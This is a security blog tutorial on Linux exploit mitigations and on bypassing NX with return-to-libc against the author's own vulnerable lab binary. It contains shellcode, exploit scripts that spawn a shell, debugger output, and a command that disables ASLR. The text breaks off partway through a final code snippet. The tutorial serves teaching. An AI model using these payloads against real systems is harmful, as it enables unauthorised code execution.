2. Linux Exploit Countermeasures and Bypasses (2)

published: October 30, 2024
reading time: 15 minutes

To make exploitation more challenging, several mitigations have been developed and widely implemented. Let’s dive into some of the most popular ones and understand how they work:

1. DEP/NX (Data Execution Prevention / No eXecute):

Data Execution Prevention (DEP), also called No eXecute (NX), is a security feature that prevents code from running in memory regions such as the stack or heap, blocking buffer overflow attacks that inject shellcode into these areas. It relies on the NX bit, known as Execute Disable (XD) in Intel terminology: a hardware mechanism that marks memory pages as non-executable. The NX bit was first introduced by AMD and later adopted by Intel as XD. Operating system support became widespread starting with Windows XP SP2 and various Linux distributions, and most modern processors provide the feature.

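How it Works: The NX bit lets the operating system mark individual memory pages as non-executable. Combined with a W^X (write XOR execute) policy, a page is normally writable or executable, but not both. This means that even if an attacker injects malicious code into a writable region such as the stack, the CPU refuses to execute it.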

Example: Trying to execute shellcode from the stack with NX enabled will cause the program to crash, preventing exploitation.
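To make the "writable or executable, but not both" idea concrete, here is a minimal Python 3 sketch that scans the text of a /proc/<pid>/maps listing for regions that are both writable and executable. The sample listing and the helper name writable_and_executable are made up for illustration; they are not taken from a real process.

```python
# Hypothetical /proc/<pid>/maps excerpt (illustrative values only).
SAMPLE_MAPS = """\
08048000-08049000 r--p 00000000 08:01 1234 /tmp/demo
08049000-0804a000 r-xp 00001000 08:01 1234 /tmp/demo
0804c000-0804d000 rw-p 00003000 08:01 1234 /tmp/demo
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""

def writable_and_executable(maps_text):
    """Return the names of mappings whose permissions contain both w and x."""
    flagged = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue  # skip blank or malformed lines
        perms = fields[1]
        name = fields[5] if len(fields) > 5 else "[anonymous]"
        if "w" in perms and "x" in perms:
            flagged.append(name)
    return flagged

# With NX in effect, nothing in the sample is both writable and executable.
print(writable_and_executable(SAMPLE_MAPS))

# An executable stack would show up with rwxp permissions.
print(writable_and_executable("fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack]"))
```

On a live system you could feed it the contents of /proc/self/maps instead of the sample string.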

2. ASLR (Address Space Layout Randomization):

Address Space Layout Randomization (ASLR) introduces randomness by shuffling the memory addresses of important regions, such as the stack, heap, and libraries, each time the program runs. This unpredictability makes it far harder for attackers to predict where their payload or code will end up.

How it Works: ASLR assigns a different memory address to regions of a process each time it’s loaded. This means an attacker can’t rely on specific memory addresses staying the same across runs.

Example: If an attacker tries to jump to a specific libc function by guessing its address, ASLR will frustrate these efforts by randomizing the location on each execution.

ASLR Configuration in Linux:

You can check and configure ASLR settings in Linux by interacting with the /proc/sys/kernel/randomize_va_space file. This file controls the level of randomization applied:

0: No randomization (static memory layout).
1: Conservative randomization (randomizes the stack, mmap base, VDSO page, and shared libraries; the brk()-managed heap is not randomized).
2: Full randomization (everything in 1, plus the brk()-managed heap).

To enable full randomization, use:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
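If you prefer to check the setting from a script, the following Python 3 sketch reads the same file and maps the value to a label. The names LEVELS, describe_aslr, and current_aslr are my own for this example, and the function falls back to "unavailable" on systems where the file cannot be read.

```python
from pathlib import Path

ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

# Labels follow the three levels listed above.
LEVELS = {
    0: "disabled",
    1: "conservative",
    2: "full",
}

def describe_aslr(raw):
    """Translate the raw file content (e.g. '2\\n') into a label."""
    return LEVELS.get(int(raw.strip()), "unknown")

def current_aslr():
    """Read the live setting, or report 'unavailable' if it cannot be read."""
    try:
        return describe_aslr(ASLR_PATH.read_text())
    except (OSError, ValueError):
        return "unavailable"

print(current_aslr())
```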

The following C program demonstrates ASLR’s effect by displaying addresses for a function, a local variable, and a dynamically allocated heap variable each time the program runs.

// gcc -m32 aslr.c -o aslr
#include <stdio.h>
#include <stdlib.h>

void print_addresses();

int main() {
    int *heap_variable = (int *)malloc(sizeof(int)); // Allocate memory on the heap
    print_addresses(); // Print function and variable addresses
    printf("Address of heap variable: %p\n", (void *)heap_variable); // Print heap address
    free(heap_variable); // Free memory
    return 0;
}

void print_addresses() {
    int local_variable;
    printf("Address of main: %p\n", (void *)main);
    printf("Address of local variable: %p\n", (void *)&local_variable);
}

Run the program multiple times with ASLR enabled (set to 2):

$ ./aslr 
Address of main: 0x566451ad
Address of local variable: 0xffd29fac
Address of heap variable: 0x581761a0
$ ./aslr 
Address of main: 0x566221ad
Address of local variable: 0xffbcf99c
Address of heap variable: 0x5701b1a0
$ ./aslr 
Address of main: 0x566441ad
Address of local variable: 0xffb70fbc
Address of heap variable: 0x570f91a0

Notice how the addresses vary each time, making memory layout unpredictable.
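One detail worth noticing in these runs is which bits change. The short Python 3 sketch below takes the nine addresses printed above and keeps only the low 12 bits (the offset inside a 4 KiB page). The helper name page_offsets is mine.

```python
PAGE_MASK = 0xFFF  # low 12 bits = offset within a 4 KiB page

# Addresses copied from the three runs shown above.
runs = {
    "main":  [0x566451AD, 0x566221AD, 0x566441AD],
    "stack": [0xFFD29FAC, 0xFFBCF99C, 0xFFB70FBC],
    "heap":  [0x581761A0, 0x5701B1A0, 0x570F91A0],
}

def page_offsets(addresses):
    """Return the distinct in-page offsets seen across the given addresses."""
    return sorted({addr & PAGE_MASK for addr in addresses})

for name, addrs in runs.items():
    print(name, [hex(off) for off in page_offsets(addrs)])
```

In these three runs, main always ends in 0x1ad and the heap pointer always ends in 0x1a0, so only the page-aligned base moved. The stack variable's low bits differ from run to run. This is why a partial overwrite of the low byte or two of a code pointer can sometimes survive ASLR.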

Disabling ASLR: By setting /proc/sys/kernel/randomize_va_space to 0, ASLR is disabled, and addresses remain static across runs:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

$ ./aslr 
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr 
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr 
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0

With ASLR disabled, addresses stay constant across runs, so an attacker can predict them and exploit memory vulnerabilities more easily.

It’s important to note that even with ASLR enabled, the offsets of functions and gadgets within a given libc build remain the same; only the base address changes. This means that once we know the libc base address, we can determine the address of any libc function or gadget at runtime simply by adding the known offset to the base.
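As a small worked example of that arithmetic, the Python 3 sketch below recovers the libc base from one known runtime address and then derives a second address from it. The offsets and the address of system() are the values derived later in this article for /usr/lib32/libc.so.6 on my machine; yours will differ. How the address is leaked in the first place is out of scope here, and libc_base_from_leak is a name I made up.

```python
# Offsets for the libc build used in this article (they differ between builds).
SYSTEM_OFFSET = 0x524C0
BIN_SH_OFFSET = 0x1C9E3C

def libc_base_from_leak(leaked_system):
    """Derive the libc base from a leaked runtime address of system()."""
    base = leaked_system - SYSTEM_OFFSET
    if base & 0xFFF:
        # A real base is page aligned; anything else means a wrong offset or leak.
        raise ValueError("computed base is not page aligned")
    return base

leaked_system = 0xF7DB14C0  # runtime address of system() seen in GDB later on
base = libc_base_from_leak(leaked_system)

print(hex(base))                  # libc base
print(hex(base + BIN_SH_OFFSET))  # runtime address of "/bin/sh"
```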

3. Stack Canaries

Stack canaries, also known as security cookies, defend against stack buffer overflows by placing a random value, the “canary,” on the stack between the local buffers and the return address. The canary acts as a sentinel: an overflow that reaches the return address must overwrite it first, which makes the tampering detectable.

How it Works: During a function call, a random canary value is inserted between the buffer and the return address on the stack. Before returning from a function, the program checks the integrity of this canary value. If it finds that the canary has been altered, it suggests a potential buffer overflow attack, prompting the program to take defensive actions such as terminating execution or invoking additional security measures.
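The check can be modelled in a few lines of Python 3. This is only a toy simulation of a stack frame as a byte array, not how the compiler implements it. The 16-byte buffer size and all helper names are assumptions for the example, and the canary keeps a zero low byte, as glibc does on Linux.

```python
import os

BUF_SIZE = 16  # hypothetical size of the local buffer

def new_canary():
    """Random 4-byte canary whose lowest byte is zero."""
    return b"\x00" + os.urandom(3)

def make_frame(canary, ret_addr):
    """Layout from low to high addresses: buffer | canary | return address."""
    return bytearray(BUF_SIZE) + canary + ret_addr

def unsafe_copy(frame, data):
    """Copy without a bounds check on the buffer, like strcpy would."""
    data = data[:len(frame)]  # keep the toy model inside the simulated frame
    frame[:len(data)] = data

def overflow_detected(data):
    """Simulate one function call: set up the frame, copy, check the canary."""
    canary = new_canary()
    ret_addr = (0x080491D5).to_bytes(4, "little")
    frame = make_frame(canary, ret_addr)
    unsafe_copy(frame, data)
    stored = bytes(frame[BUF_SIZE:BUF_SIZE + 4])
    return stored != canary

print(overflow_detected(b"A" * 8))   # fits in the buffer
print(overflow_detected(b"A" * 24))  # runs over the canary and return address
```

The first call reports no tampering, while the second one is caught before the corrupted return address would ever be used.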

Types of Stack Canaries:

Terminator Canaries: These contain common string terminators such as \x00, \r, \n, and \xFF. String functions stop copying when they hit one of these bytes, so an overflow through a string operation cannot write the correct canary and keep going past it.
Random Canaries: Generated randomly at runtime, typically drawn from /dev/urandom if available. This randomness makes it challenging for attackers to predict or manipulate the canary value.
Random XOR Canaries: Random canaries XORed with control data (like the frame pointer and return address). A change to either the canary or the control data then produces a mismatch, triggering termination.

4. RELRO (Relocation Read-Only):

Relocation Read-Only (RELRO) is a security feature implemented in the GNU linker that hardens ELF (Executable and Linkable Format) binaries by making certain sections read-only once relocation is complete. It focuses on the Global Offset Table (GOT), which holds the addresses of dynamically linked functions and is a common target in binary exploitation. With those sections read-only, GOT overwrite attacks are mitigated.

Types of RELRO

There are two modes of RELRO:

Partial RELRO:
- This mode marks the non-PLT part of the GOT (.got) as read-only after relocation.
- The part of the GOT used by the Procedure Linkage Table (.got.plt) remains writable, so while this mode provides some protection, it does not stop GOT overwrite attacks.
- Partial RELRO is often the default setting in many GCC-compiled binaries.
Full RELRO:
- In this mode, the entire GOT, including .got.plt, is made read-only after relocation.
- This provides a higher level of security by preventing any modifications to these sections during runtime.
- Full RELRO can increase startup time since all dynamic symbols must be resolved before execution begins.

Implementation of RELRO:

$ # For Partial RELRO:
$ gcc -o file file.c -Wl,-z,relro
$ # For Full RELRO:
$ gcc -o file file.c -Wl,-z,relro,-z,now

Full RELRO provides stronger protection against GOT overwrite attacks compared to Partial RELRO. However, it can lead to longer startup times since all symbols must be resolved before execution.
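If you want to tell the two modes apart without checksec, one rough approach is to look at readelf output: a GNU_RELRO program header means at least Partial RELRO, and a BIND_NOW/NOW flag in the dynamic section upgrades it to Full. The Python 3 sketch below applies that rule to text you pass in. The sample strings are hand-written approximations of readelf -l and readelf -d output, and classify_relro is a hypothetical helper, so treat it as a simplified heuristic.

```python
import re

def classify_relro(program_headers, dynamic_section):
    """Classify RELRO from the text of `readelf -l` and `readelf -d`."""
    has_relro = "GNU_RELRO" in program_headers
    bind_now = (
        "BIND_NOW" in dynamic_section
        or re.search(r"FLAGS_1.*\bNOW\b", dynamic_section) is not None
    )
    if has_relro and bind_now:
        return "Full RELRO"
    if has_relro:
        return "Partial RELRO"
    return "No RELRO"

# Hand-written sample lines (illustrative, not captured from a real binary).
HEADERS = "  GNU_RELRO      0x002f08 0x0804bf08 0x0804bf08 0x000f8 0x000f8 R   0x1"
DYNAMIC_LAZY = " 0x00000003 (PLTGOT)             0x804c000"
DYNAMIC_NOW = " 0x0000001e (FLAGS)              BIND_NOW"

print(classify_relro(HEADERS, DYNAMIC_LAZY))
print(classify_relro(HEADERS, DYNAMIC_NOW))
print(classify_relro("", DYNAMIC_LAZY))
```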

We’ll dive deeper into this concept when we explore bypass techniques.

5. PIE (Position Independent Executables)

Position Independent Executables (PIE) allow the main executable itself to be loaded at a randomized base address, adding another layer of unpredictability. Without PIE, ASLR randomizes the stack, heap, and shared libraries, but the binary’s own code stays at a fixed address; with PIE, that code moves too, making it harder to predict gadget locations for return-oriented programming (ROP) attacks.

How it Works: PIE enables the entire binary to be relocated to different memory addresses each time it runs. This feature requires the binary to be compiled in a way that allows it to operate independently of a fixed memory location.

Example: If an attacker tries to jump to a specific function within the executable, PIE will have randomized its position, forcing them to dynamically resolve the new address.
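A quick way to see whether a binary was built as PIE is the e_type field of its ELF header: fixed-address executables are ET_EXEC (2), while PIE binaries are ET_DYN (3), the same type shared libraries use. Here is a minimal Python 3 sketch of that check. It runs against a synthetic header built by the hypothetical helper fake_header, so it works without any real binary on disk.

```python
import struct

ET_EXEC = 2  # fixed-address executable
ET_DYN = 3   # shared object, also used for PIE executables

def elf_type(header):
    """Return e_type from the first 18 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] is EI_DATA: 1 = little-endian, 2 = big-endian
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type

def looks_like_pie(header):
    return elf_type(header) == ET_DYN

def fake_header(e_type):
    """Synthetic 32-bit little-endian header, for demonstration only."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)  # 16 bytes in total
    return e_ident + struct.pack("<H", e_type)

print(looks_like_pie(fake_header(ET_EXEC)))
print(looks_like_pie(fake_header(ET_DYN)))
```

For a real file you would pass open(path, "rb").read(18) instead of the synthetic header.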

To check which mitigations are enabled on a binary, you can use checksec from the pwntools suite:

$ pwn checksec exp2_nx
[*] '/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02/exp2_nx'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

From the output, we can observe:

NX: The stack is non-executable (NX enabled), blocking code execution in writable areas.
RELRO: Partial RELRO is enabled, providing limited protection for GOT entries.
Stack Canary: Not found, so the binary lacks buffer overflow protection for stack frames.
PIE: Position Independent Executable is disabled, meaning the executable loads at a fixed address.

1. Bypassing DEP/NX (Data Execution Prevention / No eXecute):

Now, let’s work on bypassing NX! We’ll attempt to execute the same shellcode from our jmp eax example.

📝 Note: Make sure ASLR is disabled before proceeding.

Compile the Binary with NX Enabled

$ gcc -m32 exp1.c -fno-stack-protector -no-pie -o exp2_nx

For this test, I’ve renamed exp1.py to exp2.py and updated it to point to our jmp eax gadget.

#!/usr/bin/python2
# exp2.py
import struct

offset = 62

libc_base = 0xf7d5f000
jmp_eax = 0x00024fe3

payload = "\x90"*10 # 10 NOPS
payload += "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" # /bin/sh shellcode
payload += "A"*(offset-len(payload)) # padding
#payload += "BBBB" # EIP
payload += struct.pack("<I",libc_base+jmp_eax) # EIP

print(payload)

Now, let’s try to execute the exploit with NX enabled on exp2_nx:

$ ./exp2_nx  $(./exp2.py)
Segmentation fault (core dumped)

Let’s examine the core dump to see what happened:

$ gdb -core core 
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffd5ce in ?? ()
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 EAX  0xffffd5ce ◂— 0x90909090
 EBX  0x41414141 ('AAAA')
 ECX  0xffffd910 ◂— 0xf7d83f
 EDX  0xffffd60d ◂— 0xf7d83f
 EDI  0xf7ffcb60 ◂— 0
 ESI  0xffffd700 —▸ 0xffffd914 ◂— 'SHELL=/usr/bin/bash'
 EBP  0x41414141 ('AAAA')
 ESP  0xffffd610 —▸ 0xffffd800 ◂— 6
 EIP  0xffffd5ce ◂— 0x90909090
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
 ► 0xffffd5ce    nop    
   0xffffd5cf    nop    
   0xffffd5d0    nop    
   0xffffd5d1    nop    
...

🔍 Here, we can see that we successfully landed on the NOP sled, but because the shellcode is in a non-executable memory region (due to NX), it cannot be executed. 😞

This example demonstrates the effectiveness of NX by preventing code execution in non-executable memory regions. 🛡️

So, how can we bypass NX? 🤔 While we can’t execute injected shellcode directly due to the non-executable stack, we can still execute existing code within the binary or libraries. This approach is called Return-Oriented Programming (ROP).

With ROP, we construct a payload that leverages small “gadgets”—existing sequences of instructions ending in a ret—to piece together our own custom execution flow. Essentially, instead of injecting new code, we’re “reusing” code that’s already in memory to achieve our exploit goals.

In this example, let’s use a technique called Return-to-libc (ret2libc) to bypass NX.

Ret2libc is a simpler and more specific form of ROP in which the attacker reuses functions that already exist in the C standard library (such as system() and exit()), typically to spawn a shell. Because libc is already mapped as executable memory, this works even when the stack is non-executable and injected shellcode cannot run. Conveniently, libc also contains the string "/bin/sh".

Here’s how ret2libc works:

Find libc functions: We locate the system() function and the "/bin/sh" string within libc. By calling system("/bin/sh"), we can spawn a shell.
Modify the payload: Instead of shellcode, our payload sets up the stack to call system("/bin/sh"), giving us shell access by reusing legitimate code that is already loaded.

Let’s implement this with our example exploit!

Find system() offset within libc:

$ nm -D /usr/lib32/libc.so.6 | grep -i system
000524c0 T __libc_system@@GLIBC_PRIVATE
00171b20 T svcerr_systemerr@GLIBC_2.0
000524c0 W system@@GLIBC_2.0

For more information on nm, refer to my blog.

The offset for the system function in libc is 0x524c0. We can verify this using GDB with the pwndbg extension.

$ gdb ./exp2_nx
pwndbg> b main
Breakpoint 1 at 0x804919f
pwndbg> run
pwndbg> xinfo system
Extended information for virtual address 0xf7db14c0:

  Containing mapping:
0xf7d82000 0xf7f0e000 r-xp   18c000  23000 /usr/lib32/libc.so.6

  Offset information:
         Mapped Area 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
         File (Base) 0xf7db14c0 = 0xf7d5f000 + 0x524c0
      File (Segment) 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
         File (Disk) 0xf7db14c0 = /usr/lib32/libc.so.6 + 0x524c0

 Containing ELF sections:
               .text 0xf7db14c0 = 0xf7d821c0 + 0x2f300

The xinfo command provides extended information about the system function, including details about its memory mapping.

From this output, we can see that the libc base address is 0xf7d5f000 and the offset for system is confirmed as 0x524c0. This information is crucial for constructing our exploit.
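The numbers in the xinfo output are related by simple arithmetic, which the Python 3 sketch below reproduces from the mapping line (start 0xf7d82000, end 0xf7f0e000, file offset 0x23000). Treating the base as "mapping start minus file offset" is an assumption that holds for this libc mapping; the variable names are mine.

```python
# Values copied from the xinfo output above.
map_start = 0xF7D82000        # start of the r-xp mapping
map_end = 0xF7F0E000          # end of the r-xp mapping
map_file_offset = 0x23000     # offset of that mapping inside libc.so.6
system_addr = 0xF7DB14C0      # runtime address of system()

map_size = map_end - map_start
libc_base = map_start - map_file_offset
offset_in_mapping = system_addr - map_start
offset_in_file = offset_in_mapping + map_file_offset

print(hex(map_size))           # matches the 18c000 size column
print(hex(libc_base))          # matches "File (Base)"
print(hex(offset_in_mapping))  # matches "Mapped Area"
print(hex(offset_in_file))     # matches the offset reported by nm
```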

The next step is finding the offset of the string "/bin/sh".

We can use the strings utility for this:

$ strings -a -t x /usr/lib32/libc.so.6 | grep "/bin/sh"
 1c9e3c /bin/sh

So the offset for string “/bin/sh” in libc is 0x1c9e3c.

We can also use GDB (pwndbg) for it:

pwndbg> search "/bin/sh"
Searching for byte: b'/bin/sh'
libc.so.6       0xf7f28e3c '/bin/sh'

So the offset will be 0xf7f28e3c-0xf7d5f000=0x1c9e3c
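The same search can be done in a few lines of Python 3, which is handy inside an exploit script. The sketch below looks for the NUL-terminated string in a bytes object. To stay self-contained it searches a small synthetic blob rather than the real library, and string_offsets is a hypothetical helper name.

```python
def string_offsets(blob, needle):
    """Return every offset at which the NUL-terminated needle occurs."""
    target = needle + b"\x00"
    offsets = []
    pos = blob.find(target)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(target, pos + 1)
    return offsets

# Synthetic stand-in for a library image: 16 padding bytes, then the string.
blob = b"\x00" * 0x10 + b"/bin/sh\x00" + b"exit 0\x00"

print([hex(off) for off in string_offsets(blob, b"/bin/sh")])
```

Against the real library you would pass open("/usr/lib32/libc.so.6", "rb").read() as the blob, which should report the same file offset that strings printed.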

To understand how function calls are made in x86 architecture and how to exploit them using the return-to-libc (ret2libc) technique, we need to break down a few concepts, particularly the call instruction and the function’s stack frame.

Function Call Mechanism

Call Instruction: When a function is called using the call instruction, the CPU performs the following steps:
- Pushes the return address (the address of the instruction following the call) onto the stack.
- Transfers control to the function by jumping to its address.
Function Arguments: Arguments are placed on the stack or in specific registers (depending on the calling convention) before the call instruction executes. For example, in the cdecl calling convention, the caller pushes them onto the stack in right-to-left order.

For example:

call my_function

If my_function is located at address 0x08048400, the CPU will push the return address (say, 0x0804840A) onto the stack and jump to 0x08048400.

Argument Handling

For instance, if my_function expects two integer arguments, you might see something like this:

push 2      ; Push the second argument onto the stack
push 1      ; Push the first argument onto the stack
call my_function
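To see what those three instructions leave on the stack, here is a toy Python 3 model of a 32-bit stack. The Stack32 class and the starting ESP value are made up for illustration; the function and return addresses are the ones from the example above.

```python
class Stack32:
    """Toy model of a downward-growing 32-bit stack."""

    def __init__(self, esp):
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4                      # the stack grows toward lower addresses
        self.mem[self.esp] = value & 0xFFFFFFFF

    def call(self, return_address, target):
        self.push(return_address)          # call pushes the return address...
        return target                      # ...and jumps to the function

    def dump(self, count):
        """Return `count` dwords starting at the top of the stack."""
        return [self.mem[self.esp + 4 * i] for i in range(count)]

stack = Stack32(esp=0xFFFFD5D8)            # arbitrary starting ESP
stack.push(2)                              # second argument
stack.push(1)                              # first argument
eip = stack.call(return_address=0x0804840A, target=0x08048400)

print(hex(eip), hex(stack.esp))
print([hex(v) for v in stack.dump(3)])
```

On entry to my_function, [esp] holds the return address, [esp+4] the first argument, and [esp+8] the second. This is exactly the layout a ret2libc payload has to fake.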

Practical Example: C Program 🖥️

I’ve used the following C program to explain it more practically:

#include <stdio.h>
void two_str(char *s1, char *s2) {
    printf("%s\n",s1);
    printf("%s\n",s2);
}

int main() {
    char *str1="hello";
    char *str2="world";
    two_str(str1,str2);
}

To see how function calls work, disassemble main:

pwndbg> disass main
Dump of assembler code for function main:
   0x0804919a <+0>:	lea    ecx,[esp+0x4]
   0x0804919e <+4>:	and    esp,0xfffffff0
   0x080491a1 <+7>:	push   DWORD PTR [ecx-0x4]
   0x080491a4 <+10>:	push   ebp
   0x080491a5 <+11>:	mov    ebp,esp
   0x080491a7 <+13>:	push   ecx
   0x080491a8 <+14>:	sub    esp,0x14
   0x080491ab <+17>:	call   0x80491e5 <__x86.get_pc_thunk.ax>
   0x080491b0 <+22>:	add    eax,0x2e44
   0x080491b5 <+27>:	lea    edx,[eax-0x1fec]
   0x080491bb <+33>:	mov    DWORD PTR [ebp-0xc],edx
   0x080491be <+36>:	lea    eax,[eax-0x1fe6]
   0x080491c4 <+42>:	mov    DWORD PTR [ebp-0x10],eax
   0x080491c7 <+45>:	sub    esp,0x8
   0x080491ca <+48>:	push   DWORD PTR [ebp-0x10]
   0x080491cd <+51>:	push   DWORD PTR [ebp-0xc]
   0x080491d0 <+54>:	call   0x8049166 <two_str>
   0x080491d5 <+59>:	add    esp,0x10
   0x080491d8 <+62>:	mov    eax,0x0
   0x080491dd <+67>:	mov    ecx,DWORD PTR [ebp-0x4]
   0x080491e0 <+70>:	leave
   0x080491e1 <+71>:	lea    esp,[ecx-0x4]
   0x080491e4 <+74>:	ret

At instructions +48 and +51, you can see that pointers to the strings are pushed onto the stack.

Let’s set a breakpoint at 0x080491d0 (i.e., *main + 54) and run the program:

pwndbg> b *0x080491d0
Breakpoint 1 at 0x80491d0
pwndbg> run

Now, let’s examine the stack right before we call two_str:

pwndbg> x/2wx $sp
0xffffd5d0:	0x0804a008	0x0804a00e
pwndbg> x/s 0x0804a008
0x804a008:	"hello"
pwndbg> x/s 0x0804a00e
0x804a00e:	"world"
pwndbg> stack 2
00:0000│ esp 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
01:0004│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'

You can see that the pointer to the string world is pushed before the pointer to the string hello.

Now, let’s continue to the function call:

pwndbg> b *0x8049166
Breakpoint 2 at 0x8049166
pwndbg> c

When we print the stack now, we see that the top of the stack points to the return address 0x080491d5 (i.e., *main+59):

pwndbg> stack 3
00:0000│ esp 0xffffd5cc —▸ 0x80491d5 (main+59) ◂— add esp, 0x10
01:0004│-028 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
02:0008│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'
pwndbg> x/3wx $esp
0xffffd5cc:	0x080491d5	0x0804a008	0x0804a00e

I hope you now understand what happens when we call a function with arguments.

The following picture should make the ret2libc stack layout clear:

[Figure: ret2libc]

#!/usr/bin/python2
# exp3.py
import struct

offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c

payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh

print(payload)

For easy understanding, I’ve used 0xdeadbeef as the return address, which is where execution lands after system("/bin/sh") returns.
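To double-check that the three dwords sit where a called function expects them, the Python 3 sketch below rebuilds the same payload as bytes and labels each slot. It uses the offsets and libc base from exp3.py; build_payload and describe are names I made up, and this is an inspection aid rather than a replacement for the Python 2 script.

```python
import struct

OFFSET = 62
LIBC_BASE = 0xF7D5F000
SYSTEM = LIBC_BASE + 0x524C0
BIN_SH = LIBC_BASE + 0x1C9E3C

def build_payload(return_address):
    """Same layout as exp3.py, built as bytes for Python 3."""
    payload = b"A" * OFFSET
    payload += struct.pack("<I", SYSTEM)          # overwrites saved EIP
    payload += struct.pack("<I", return_address)  # where system() returns to
    payload += struct.pack("<I", BIN_SH)          # first argument of system()
    return payload

def describe(payload):
    """Label the three dwords that follow the padding."""
    labels = [
        "saved EIP -> system()",
        "return address for system()",
        "argument for system()",
    ]
    words = struct.unpack_from("<3I", payload, OFFSET)
    return [(label, hex(word)) for label, word in zip(labels, words)]

for label, value in describe(build_payload(0xDEADBEEF)):
    print(f"{label:30} {value}")
```

Note that in Python 3 the raw payload would have to be written with sys.stdout.buffer.write(), since print() would not emit the bytes unchanged.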

./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02

As you can see, we got a shell :)

But let’s exit from the shell and see what happens.

./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
Segmentation fault (core dumped)

As you can see, we got a segfault. Let’s examine the core dump.

$ gdb -core core
...
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 EAX  0
 EBX  0x41414141 ('AAAA')
 ECX  0xffffd2d4 ◂— 0
 EDX  0
 EDI  0xf7ffcb60 ◂— 0
 ESI  0xffffd6c0 —▸ 0xffffd8de ◂— 'SHELL=/usr/bin/bash'
 EBP  0x41414141 ('AAAA')
 ESP  0xffffd5d4 —▸ 0xf7f28e3c ◂— '/bin/sh'
 EIP  0xdeadbeef
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0xdeadbeef

...

As you can see, we landed on an invalid address.

To land on a safe address instead, we will use the exit() function.

$ nm -D /usr/lib32/libc.so.6 | grep exit
...
0003eac0 T exit@@GLIBC_2.0

We can verify this:

pwndbg> xinfo exit
Extended information for virtual address 0xf7d9dac0:

  Containing mapping:
0xf7d82000 0xf7f0e000 r-xp   18c000  23000 /usr/lib32/libc.so.6

  Offset information:
         Mapped Area 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
         File (Base) 0xf7d9dac0 = 0xf7d5f000 + 0x3eac0
      File (Segment) 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
         File (Disk) 0xf7d9dac0 = /usr/lib32/libc.so.6 + 0x3eac0

 Containing ELF sections:
               .text 0xf7d9dac0 = 0xf7d821c0 + 0x1b900

Here’s our exploit to perform ret2libc:

#!/usr/bin/python2
# exp3.py
import struct

offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0

payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh

print(payload)

By replacing 0xdeadbeef with a valid exit function address, we ensure the process exits gracefully instead of crashing.😊

./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
0

In Linux, the command echo $? is used to print the exit status of the last executed command.

Extra Info:

What if we want the exit status to be 255?

To set the exit status to 255, which in hexadecimal is represented as 0xFF, we can add 0xff as an argument to exit() right after the pointer to the string "/bin/sh".

[Figure: ret2libc]

#!/usr/bin/python2
# exp3.py
import struct

offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0

payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
payload += struct.pack("<I",0xff) # exit status

print(payload)

./exp2_nx $(./exp3.py)
bash: warning: command substitution: ignored null byte in input
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
255

This way, we can control the exit status directly through our payload.
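Two details of that run are worth a quick look: the bash warning about null bytes, and why the status still comes out as 255. The Python 3 sketch below shows that the packed 0xff contains three null bytes (which bash drops from the command substitution), and that only the low 8 bits of the value passed to exit() are reported to the parent. What ends up in the upper three bytes on the real stack depends on the vulnerable program, so the value 0x4141FF is purely illustrative, as is the helper name reported_status.

```python
import struct

packed = struct.pack("<I", 0xFF)
print(packed)                            # the dword as it is appended to the payload
print(packed.count(b"\x00"))             # number of null bytes bash complains about

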